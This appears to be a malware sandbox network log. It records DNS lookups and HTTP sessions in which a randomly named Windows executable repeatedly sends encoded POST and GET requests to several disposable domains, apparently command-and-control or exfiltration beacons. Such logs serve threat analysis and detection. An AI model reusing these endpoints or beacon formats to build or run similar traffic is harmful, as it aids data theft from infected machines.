Jan 11, 2025 03:32:04.077500105 CET | 63681 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:32:04.427534103 CET | 53 | 63681 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:32:20.460206985 CET | 58008 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:32:20.786391020 CET | 53 | 58008 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:32:34.553423882 CET | 56789 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:32:34.897743940 CET | 53 | 56789 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:33:09.006859064 CET | 59716 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:33:09.018439054 CET | 53 | 59716 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:33:22.290903091 CET | 62439 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:33:22.354392052 CET | 53 | 62439 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:33:35.633029938 CET | 59436 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:33:36.104785919 CET | 53 | 59436 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:33:49.714714050 CET | 55134 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:33:49.732094049 CET | 53 | 55134 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:34:05.899688005 CET | 51190 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:34:05.911192894 CET | 53 | 51190 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 03:32:04.077500105 CET | 192.168.2.10 | 1.1.1.1 | 0x8b3 | Standard query (0) | www.qqa79.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:20.460206985 CET | 192.168.2.10 | 1.1.1.1 | 0xa4f3 | Standard query (0) | www.gk88top.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:34.553423882 CET | 192.168.2.10 | 1.1.1.1 | 0x5bb9 | Standard query (0) | www.127358.win | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:09.006859064 CET | 192.168.2.10 | 1.1.1.1 | 0xee86 | Standard query (0) | www.infohive.website | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:22.290903091 CET | 192.168.2.10 | 1.1.1.1 | 0x5d89 | Standard query (0) | www.sunnyz.store | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:35.633029938 CET | 192.168.2.10 | 1.1.1.1 | 0xb371 | Standard query (0) | www.muasamgiare.click | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:49.714714050 CET | 192.168.2.10 | 1.1.1.1 | 0x2d2f | Standard query (0) | www.sfantulandrei.info | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:34:05.899688005 CET | 192.168.2.10 | 1.1.1.1 | 0xa454 | Standard query (0) | www.mffnow.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 03:32:04.427534103 CET | 1.1.1.1 | 192.168.2.10 | 0x8b3 | No error (0) | www.qqa79.top | qqa79.top | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 03:32:04.427534103 CET | 1.1.1.1 | 192.168.2.10 | 0x8b3 | No error (0) | qqa79.top | | 38.47.233.21 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:20.786391020 CET | 1.1.1.1 | 192.168.2.10 | 0xa4f3 | No error (0) | www.gk88top.top | | 172.67.137.47 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:20.786391020 CET | 1.1.1.1 | 192.168.2.10 | 0xa4f3 | No error (0) | www.gk88top.top | | 104.21.7.187 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:34.897743940 CET | 1.1.1.1 | 192.168.2.10 | 0x5bb9 | No error (0) | www.127358.win | | 206.238.89.119 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:09.018439054 CET | 1.1.1.1 | 192.168.2.10 | 0xee86 | No error (0) | www.infohive.website | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:22.354392052 CET | 1.1.1.1 | 192.168.2.10 | 0x5d89 | No error (0) | www.sunnyz.store | webredir.vip.gandi.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 03:33:22.354392052 CET | 1.1.1.1 | 192.168.2.10 | 0x5d89 | No error (0) | webredir.vip.gandi.net | | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:36.104785919 CET | 1.1.1.1 | 192.168.2.10 | 0xb371 | No error (0) | www.muasamgiare.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 03:33:36.104785919 CET | 1.1.1.1 | 192.168.2.10 | 0xb371 | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:36.104785919 CET | 1.1.1.1 | 192.168.2.10 | 0xb371 | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:49.732094049 CET | 1.1.1.1 | 192.168.2.10 | 0x2d2f | No error (0) | www.sfantulandrei.info | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:49.732094049 CET | 1.1.1.1 | 192.168.2.10 | 0x2d2f | No error (0) | www.sfantulandrei.info | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:34:05.911192894 CET | 1.1.1.1 | 192.168.2.10 | 0xa454 | No error (0) | www.mffnow.info | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:34:05.911192894 CET | 1.1.1.1 | 192.168.2.10 | 0xa454 | No error (0) | www.mffnow.info | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:34:05.911192894 CET | 1.1.1.1 | 192.168.2.10 | 0xa454 | No error (0) | www.mffnow.info | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:34:05.911192894 CET | 1.1.1.1 | 192.168.2.10 | 0xa454 | No error (0) | www.mffnow.info | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:34:05.911192894 CET | 1.1.1.1 | 192.168.2.10 | 0xa454 | No error (0) | www.mffnow.info | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:34:05.911192894 CET | 1.1.1.1 | 192.168.2.10 | 0xa454 | No error (0) | www.mffnow.info | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:34:05.911192894 CET | 1.1.1.1 | 192.168.2.10 | 0xa454 | No error (0) | www.mffnow.info | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
• www.qqa79.top
• www.gk88top.top
• www.127358.win
• www.infohive.website
• www.sunnyz.store
• www.muasamgiare.click
• www.sfantulandrei.info
• www.mffnow.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49974 | 38.47.233.21 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:32:04.449843884 CET | 578 | OUT | GET /t67p/?WLtH=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXJ5swGMf6I8KHf6mMNpdMDm5G/Ryzlg==&W0-=CzJDBfQxOTFPL HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Host: www.qqa79.top
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Jan 11, 2025 03:32:05.334860086 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 02:32:05 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49975 | 172.67.137.47 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:32:20.809668064 CET | 836 | OUT | POST /vjnn/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.gk88top.top
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 193
Cache-Control: no-cache
Origin: http://www.gk88top.top
Referer: http://www.gk88top.top/vjnn/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Data Raw: 57 4c 74 48 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 50 79 73 6d 45 4a 79 38 36 66 66 4e 4d 41 42 63 37 55 32 59 39 39 76 39 62 72 38 52 57 46 44 52 2f 5a 5a 39 4f 42 4e 6f 78 76 64 57 77 34 6f 73 33 72 37 4f 78 79 35 61 63 55 42 39 77 63 47 2f 41 73 4b 32 44 39 38 76 33 56 68 39 2b 42 52 52 6d 73 50 4b 46 68 55 56 7a 62 6d 30 41 59 4b 72 77 39 4f 62 31 4a 78 34 76 2b 4e 51 56 36 42 4f 56 6d 75 36 55 62 41 67 54 4e 6f 51 4c 70 63 58 37 77 36 44 70 6b 39 43 70 4b 67 71 49 74 53 35 67 4c 50 65 75 62 5a 38 42 43 4a 48 4d 66 7a 6a 78 70 5a 43 4a 52 48 76 6c 69 66 46 31 4f 75 4f
Data Ascii: WLtH=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeubZ8BCJHMfzjxpZCJRHvlifF1OuO
Jan 11, 2025 03:32:21.841304064 CET | 974 | IN | HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 02:32:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IAews4r%2BdV1W5zco7n%2BwOoWPqvUS27R9vQDvypA0Njm%2BYEyeAZ5GRXi61ICjcmeFS6e8V5auBVtWPy5LYDD%2FTaoHVdw8srkjYIy55pcNZrTXJyAKNLda%2FEFXcTsowfXTLg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90017eec8f467c78-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=836&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49976 | 172.67.137.47 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:32:23.354429007 CET | 860 | OUT | POST /vjnn/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Host: www.gk88top.top
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 217
Cache-Control: no-cache
Origin: http://www.gk88top.top
Referer: http://www.gk88top.top/vjnn/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Data Raw: 57 4c 74 48 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 76 52 2f 35 70 39 4e 45 74 6f 77 76 64 57 6c 49 6f 70 70 62 37 5a 78 79 30 76 63 57 56 39 77 63 53 2f 41 70 32 32 44 4d 38 73 32 46 68 37 67 68 52 54 72 4d 50 4b 46 68 55 56 7a 62 62 68 41 5a 69 72 77 75 47 62 30 72 4a 6e 69 65 4e 54 43 4b 42 4f 52 6d 75 32 55 62 42 33 54 50 4e 33 4c 72 30 58 37 78 71 44 75 33 6c 42 6e 36 67 6b 4c 64 53 79 75 35 2b 49 30 4c 39 7a 59 68 42 4e 56 5a 37 33 2f 6f 6b 46 59 41 6d 34 32 56 44 4c 37 49 62 6b 6e 41 39 79 4a 62 63 4b 30 6c 4d 72 47 76 77 51 47 50 54 70 4e 51 3d 3d
Data Ascii: WLtH=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxvR/5p9NEtowvdWlIoppb7Zxy0vcWV9wcS/Ap22DM8s2Fh7ghRTrMPKFhUVzbbhAZirwuGb0rJnieNTCKBORmu2UbB3TPN3Lr0X7xqDu3lBn6gkLdSyu5+I0L9zYhBNVZ73/okFYAm42VDL7IbknA9yJbcK0lMrGvwQGPTpNQ==
Jan 11, 2025 03:32:24.371018887 CET | 974 | IN | HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 02:32:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfufDZJLHbRNzoItasHbDw9Jz%2FsLEB7Lx98G1uiohN2AQvOx4wyEC15skc%2Fl2ZgwE27zKnjwAFJ%2FBzIH798R85lsLs%2FVRVrc6MX1LQZtu%2FvevMYJZZZtqwVkxZXLUhHgue8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90017efc69fc1831-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1677&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=860&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.1049977172.67.137.47806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:32:25.916013002 CET1873OUTPOST /vjnn/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.gk88top.top
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.gk88top.top
                                                          Referer: http://www.gk88top.top/vjnn/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 6e 52 2f 71 52 39 4f 69 6c 6f 69 2f 64 57 35 59 6f 53 70 62 37 59 78 78 45 72 63 57 5a 48 77 66 71 2f 41 4c 4f 32 42 35 63 73 38 46 68 37 6f 42 52 51 6d 73 50 6c 46 68 45 4a 7a 61 33 68 41 5a 69 72 77 75 71 62 39 5a 78 6e 78 4f 4e 51 56 36 42 61 56 6d 75 53 55 62 5a 6e 54 50 5a 4e 4c 61 55 58 38 52 61 44 72 45 42 42 6c 61 68 43 4f 64 54 79 75 35 7a 57 30 4c 67 43 59 69 64 7a 56 65 66 33 2b 4e 30 47 41 30 53 50 6a 31 48 73 38 37 37 76 33 48 42 30 41 76 31 33 37 67 41 2b 47 39 38 62 54 4d 2b 77 58 6c 76 47 52 51 79 54 6b 2b 4b 4c 74 32 43 50 7a 48 4a 59 36 62 45 45 61 2f 49 65 43 76 78 69 61 31 59 55 46 45 4a 70 45 64 6c 4c 59 4f 6e 36 47 36 30 59 4c 76 68 54 76 33 56 61 75 67 62 55 46 6e 6d 50 67 70 6d 66 53 55 47 2b 41 61 41 69 79 58 7a 71 54 4c 34 63 73 6a 54 44 31 46 50 4c 32 32 6c 4b 77 55 37 43 6c 48 73 58 43 45 58 32 42 31 68 47 4a 35 64 77 67 46 57 6a 46 [TRUNCATED]
                                                          Data Ascii: WLtH=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxnR/qR9Oiloi/dW5YoSpb7YxxErcWZHwfq/ALO2B5cs8Fh7oBRQmsPlFhEJza3hAZirwuqb9ZxnxONQV6BaVmuSUbZnTPZNLaUX8RaDrEBBlahCOdTyu5zW0LgCYidzVef3+N0GA0SPj1Hs877v3HB0Av137gA+G98bTM+wXlvGRQyTk+KLt2CPzHJY6bEEa/IeCvxia1YUFEJpEdlLYOn6G60YLvhTv3VaugbUFnmPgpmfSUG+AaAiyXzqTL4csjTD1FPL22lKwU7ClHsXCEX2B1hGJ5dwgFWjFMnt2iPE9YxRvvDQZkhUb+B/V/4eLA7IhrgFQ5bLCgTm+8TC4z7Mn7XVpCfnjsJ9xIMJB+a1o4C6V0nu5dr2/XTVZsFkOU44Av0SIgzWB76ASkYQc3mAH2BA36nKDaS047jPGmuW+TZI61YFb7PtS1n/boeiYqkTvLdp1XqzA9kFzU0k/5MkdtnDB6L8RgMyWBVZ2i5HbOl7xGFmF6S1fIfozJL8ncVVUBBodhQuVve55w7NnYF0FN+87VtA0UYuygz64xG2V+IL9PZL38EoHlKB6cQ5s6gIZlf21mm/Pit7Lhez84t8bTiRD6n299ffXU7XXEoVZAd4VN0zXeokNfo+D1UgXlhqLliBwApf8SzkhDllUlTfTO42Z8qi/xkvSiqR8M0al22k3wgiKThTGVMiWS9W7U54HuD+WLHZO5/FraLod7kvSau8++IQqFCYojzZl3ZS5bsSONpOis1DAthhyxRY1xHTdMXLRuMyXuOaHSQoT3SaH6Eg7GbbXf5D8JPNEGmCdgTmxs+oqlbZOJI5+XcPlNuKgHXeh/fXJ4nnFF9lXMrOtlrpVmRVWV6itTGJhSgTS4oD0JnGM/AiMqNcsHlM7y1uCeth/V71pyjF9NA+RgoV2KpiFapPMr1pArTyg8kW00F2cu0smBFWpwN2cMaW8BDBrw4 [TRUNCATED]
                                                          Jan 11, 2025 03:32:26.971700907 CET | 967 | IN | HTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:32:26 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oElepLcww0bT6vSsBAYuZmSBfA6vcTe67EQuvQQ7Rt40GJHsMKw5E9Kw4uEm5S%2FIixodfDMaPy2wWK0WTV5C8Kiu96aNsxsB25OpXhQHv0P1Zi2n4tBCTd42Y7K0WZNlxjY%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 90017f0c993042ac-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1766&rtt_var=883&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1873&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID: 4 | Source IP: 192.168.2.10 | Source Port: 49979 | Destination IP: 172.67.137.47 | Destination Port: 80 | PID: 6352 | Process: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:32:28.464070082 CET | 580 | OUT | GET /vjnn/?WLtH=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1FtKgHUps+jxIjoel/WuIa3Au8OorA==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.gk88top.top
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:32:29.533134937 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:32:29 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RWJ7RYcwmQkKmK8PW0xudB3EKyR77NkIT5YfdVVVtmgDj8SvW1PXGgdyY4RdIjpirHvpkfZW5mmI%2FHtIwQJidUWKxK3%2BQBOuIsxei3Brb5GSEAkyLUjKSN74EWeMSRXhyHM%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 90017f1cad897cae-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1878&min_rtt=1878&rtt_var=939&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=580&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly
                                                          Jan 11, 2025 03:32:29.533154011 CET | 90 | IN | Data Ascii: error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                          Session ID: 5 | Source IP: 192.168.2.10 | Source Port: 49980 | Destination IP: 206.238.89.119 | Destination Port: 80 | PID: 6352 | Process: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:32:34.921533108 CET | 833 | OUT | POST /2mep/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.127358.win
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.127358.win
                                                          Referer: http://www.127358.win/2mep/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
